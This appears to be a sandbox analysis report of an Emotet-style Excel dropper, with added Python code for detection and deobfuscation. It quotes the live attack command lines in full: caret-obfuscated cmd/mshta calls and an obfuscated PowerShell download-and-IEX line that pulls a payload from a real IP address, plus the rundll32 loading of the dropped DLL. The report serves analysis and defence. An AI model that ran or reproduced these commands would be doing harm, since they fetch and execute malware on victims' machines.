Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
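The process chain listed above (EXCEL.EXE > cmd.exe > mshta.exe > powershell.exe > cmd.exe > rundll32.exe, after which rundll32.exe re-launches itself on the module copied under C:\Windows\SysWOW64\<random>\) is what the Sigma hits in the Signatures list key on. The Python below is an added example and not part of the Joe Sandbox report: it encodes those parent/child and command-line rules and runs them over process-creation events constructed from the command lines in this report. The pids and ppids, the abbreviated powershell.exe command line and the benign rundll32.exe control event are assumptions made for the example.

```python
"""Sigma-style process-tree checks for the chain this report records:
EXCEL.EXE -> cmd.exe -> mshta.exe -> powershell.exe -> cmd.exe -> rundll32.exe.
The events below are constructed from the report's command lines, not a real log."""
import re
from dataclasses import dataclass

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
# rundll32.exe <module>,<export>  or  rundll32.exe <module> <export>, module optionally quoted
RUNDLL32_MODULE = re.compile(r'(?i)rundll32\.exe\s+"?([^",]+?)"?(?:,\s*|\s+)(\w+)\s*$')


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev, parent):
    """Microsoft Office Product Spawning Windows Shell."""
    return parent is not None and basename(parent.image) in OFFICE and basename(ev.image) in SHELLS


def mshta_spawns_shell(ev, parent):
    """MSHTA Spawning Windows Shell: the HTA stage hands off to cmd or PowerShell."""
    return (parent is not None and basename(parent.image) == "mshta.exe"
            and basename(ev.image) in {"cmd.exe", "powershell.exe"})


def caret_obfuscated_cmdline(ev):
    """cmd.exe strips '^' before execution; several of them inside one token
    ('ms^hta', '91.2^40') exist only to break string matching."""
    return basename(ev.image) == "cmd.exe" and ev.cmdline.count("^") >= 3


def rundll32_odd_module(ev):
    """rundll32 loading a module from C:\\ProgramData, or anything under SysWOW64
    that is not a .dll (this sample uses .cqz/.srm/.ptx in random subfolders)."""
    if basename(ev.image) != "rundll32.exe":
        return False
    m = RUNDLL32_MODULE.search(ev.cmdline)
    if not m:
        return False
    module = m.group(1).strip().lower()
    return module.startswith("c:\\programdata\\") or (
        module.startswith("c:\\windows\\syswow64\\") and not module.endswith(".dll"))


def evaluate(events):
    """Return (pid, rule) pairs; the parent is looked up by ppid within the same batch."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if office_spawns_shell(ev, parent):
            hits.append((ev.pid, "office_spawns_shell"))
        if mshta_spawns_shell(ev, parent):
            hits.append((ev.pid, "mshta_spawns_shell"))
        if caret_obfuscated_cmdline(ev):
            hits.append((ev.pid, "caret_obfuscated_cmdline"))
        if rundll32_odd_module(ev):
            hits.append((ev.pid, "rundll32_odd_module"))
    return hits


# Constructed events: command lines copied from the report, pids/ppids invented for the example.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta http://91.240.118.168/vvv/ppp/fe.html"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1=...'),  # abbreviated
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD'),
    ProcEvent(600, 500, r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD"),
    ProcEvent(700, 600, r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer'),
    ProcEvent(800, 700, r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ'),
    # benign control: a Control Panel applet started through rundll32 from System32
    ProcEvent(900, 1, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The rules are deliberately narrow: the parent/child checks fire on the two hand-offs that a document should never make (Office to a shell, mshta to PowerShell), and the rundll32 check is keyed on where the module lives and what it is called rather than on the export name, which Emotet randomises.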
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE7DE.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 4B14.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l Jump to behavior
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039408D2 push 8B490321h; iretd 4_3_039408D7
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039400BB push 8B490321h; iretd 4_3_039400C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0C04 push ss; ret 15_2_003C0E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0F14 push FFFFFFF8h; retf 15_2_003C0F23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x9432d
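The two command lines flagged under Data Obfuscation (and listed again in the process chain above) carry obfuscation that exists only to defeat string matching: cmd.exe discards '^' before running the command, and the PowerShell stage builds (New-Object Net.WebClient).DownloadString('http://91.240.118.168/vvv/ppp/fe.png') from fragments padded with the token {FdrggvdRf}, strips the token with .replace(), joins the fragments with -Join and feeds the result to IEX (written I`E`X, since PowerShell drops backticks in bare words). The Python below is an added example and not part of the report: it reverses both layers and recovers the two stage URLs. The command lines are copied from the report; the regular expressions are tuned to this sample's replace/-Join/IEX shape and are the example's own assumption, not a general PowerShell parser.

```python
"""Undo the two obfuscation layers on the command lines in this report:
cmd.exe caret escapes (ms^hta) and PowerShell's '<junk>'.replace()/-Join/IEX build-up.
Command lines are copied from the report; everything else is added example code."""
import re

CMD_CMDLINE = "CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l"
PS_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit '
    r"$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); "
    r"$c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); "
    r"$c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');"
    r"$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# $name='...junk...'.replace('junk', '')   (a '' inside the body is an escaped single quote)
VAR_ASSIGN = re.compile(r"(?i)\$(\w+)\s*=\s*'((?:[^']|'')*)'\.replace\('([^']*)',\s*''\)")
# $name=($a,$b,$c -Join '')
JOIN = re.compile(r"(?i)\$(\w+)\s*=\s*\(((?:\$\w+\s*,\s*)*\$\w+)\s+-Join\s+''\)")
URL = re.compile(r'''https?://[^\s'")]+''')


def strip_cmd_carets(cmdline):
    """cmd.exe removes '^' (outside double quotes) before the command runs, so
    'ms^hta' and 'mshta' are the same program; '^^' stands for one literal caret."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quotes = not in_quotes
            out.append(c)
        elif c == "^" and not in_quotes:
            if i + 1 < len(cmdline):        # the escaped character is emitted as-is
                out.append(cmdline[i + 1])
                i += 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def deobfuscate_powershell(cmdline):
    """Resolve the tagged fragments, join them in -Join order and report what IEX runs."""
    fragments = {}
    for name, body, token in VAR_ASSIGN.findall(cmdline):
        fragments[name] = body.replace(token, "").replace("''", "'")
    joined = {}
    for name, parts in JOIN.findall(cmdline):
        names = [p.strip().lstrip("$") for p in parts.split(",")]
        joined[name] = "".join(fragments.get(n, "") for n in names)
    # PowerShell ignores backticks inside bare words, so I`E`X is Invoke-Expression
    bare = cmdline.replace("`", "")
    targets = re.findall(r"(?i)\b(?:iex|invoke-expression)\s+\$(\w+)", bare)
    executed = [joined.get(n, fragments.get(n)) for n in targets]
    return {"fragments": fragments, "joined": joined, "iex": [e for e in executed if e]}


def stage_urls(cmd_cmdline, ps_cmdline):
    """Every download URL the two stages touch, in execution order."""
    urls = URL.findall(strip_cmd_carets(cmd_cmdline))
    for code in deobfuscate_powershell(ps_cmdline)["iex"]:
        urls += URL.findall(code)
    return urls


if __name__ == "__main__":
    print(strip_cmd_carets(CMD_CMDLINE))
    print(deobfuscate_powershell(PS_CMDLINE)["iex"])
    print(stage_urls(CMD_CMDLINE, PS_CMDLINE))
```

Note that the recovered expression only downloads the next stage as a string; the trailing |I`E`X is what executes it, which is why the PowerShell process goes on to drop C:\ProgramData\QWER.dll and start cmd.exe.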

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 1832 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 0000000C.00000002.564500652.000000000057A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354087 mov eax, dword ptr fs:[00000030h] 9_2_00354087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4087 mov eax, dword ptr fs:[00000030h] 10_2_001F4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00214087 mov eax, dword ptr fs:[00000030h] 11_2_00214087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4087 mov eax, dword ptr fs:[00000030h] 12_2_002E4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14087 mov eax, dword ptr fs:[00000030h] 14_2_00B14087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B3487 mov eax, dword ptr fs:[00000030h] 15_2_003B3487
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00214087 mov eax, dword ptr fs:[00000030h] 15_2_00214087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
